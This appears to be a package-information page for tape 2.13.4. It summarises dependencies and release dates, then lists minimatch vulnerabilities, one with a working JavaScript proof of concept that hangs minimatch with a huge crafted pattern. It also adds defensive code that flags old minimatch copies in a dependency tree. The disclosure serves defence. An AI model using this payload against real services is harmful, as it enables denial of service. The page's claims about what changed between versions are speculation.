Tape is a popular and lightweight TAP-producing test harness specifically designed for Node.js and browser environments. Version 2.13.4 represents a minor update over its predecessor, version 2.13.3, both maintaining the same core functionality and developer-friendly experience. The core dependencies remain consistent, featuring modules like glob for file system matching, defined for concise variable checks, resumer and through for streaming utilities, inherits for prototype-based inheritance, deep-equal for robust object comparison, and object-inspect for detailed object string representations. Similarly, the development dependencies used for testing and building Tape itself, including tap for running tests, falafel for AST manipulation, and concat-stream for efficient stream handling, were unchanged.
The key distinction lies in the release date: version 2.13.4 was published on July 20, 2014, whereas version 2.13.3 was released on June 12, 2014. This suggests that version 2.13.4 likely contains bug fixes, performance improvements, or minor internal adjustments implemented after the preceding release. Developers benefit from Tape's simplicity and its generation of TAP-compliant output, readily compatible with various TAP reporters and CI systems. Tape remains authored by James Halliday (substack), and distributed under the permissive MIT license. Given the subtle nature of the changes between these versions, upgrading from 2.13.3 to 2.13.4 is recommended to take advantage of any fixes. Consider reviewing the commit history for specific details on the updates.
All the vulnerabilities related to the version 2.13.4 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
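One way to check whether a dependency tree still carries a copy of minimatch older than the 3.0.2 fix named above. This is an added example, not code from the advisory, tape or minimatch. It assumes a tree shaped like `npm ls --json` output; the sample tree, its package versions and the helper names are constructed for illustration.

```javascript
// Added example; SAMPLE_TREE and its versions are constructed, not from a real install.
const FIXED = "3.0.2"; // fix version stated in the advisory above

// Compare dotted numeric versions. Assumption: prerelease/build suffixes are ignored.
function compareVersions(a, b) {
  const pa = a.split(/[-+]/)[0].split(".").map(Number);
  const pb = b.split(/[-+]/)[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Walk the nested `dependencies` objects and collect every copy of `name`
// older than `fixed`, together with the dependency path that pulls it in.
function findVulnerable(tree, name, fixed) {
  const hits = [];
  (function walk(node, path) {
    for (const [dep, info] of Object.entries(node.dependencies || {})) {
      const known = typeof info.version === "string"; // missing deps have no version
      const here = path.concat(`${dep}@${known ? info.version : "unknown"}`);
      if (dep === name && known && compareVersions(info.version, fixed) < 0) {
        hits.push(here.join(" > "));
      }
      walk(info, here); // transitive copies are the ones that are easy to miss
    }
  })(tree, [`${tree.name}@${tree.version}`]);
  return hits;
}

// Constructed sample: one old transitive copy and one patched direct copy.
const SAMPLE_TREE = {
  name: "my-app", version: "1.0.0",
  dependencies: {
    tape: { version: "2.13.4", dependencies: {
      glob: { version: "3.2.11", dependencies: {
        minimatch: { version: "0.3.0" } } } } },
    minimatch: { version: "3.0.4" },
  },
};

console.log(findVulnerable(SAMPLE_TREE, "minimatch", FIXED));
```
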
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.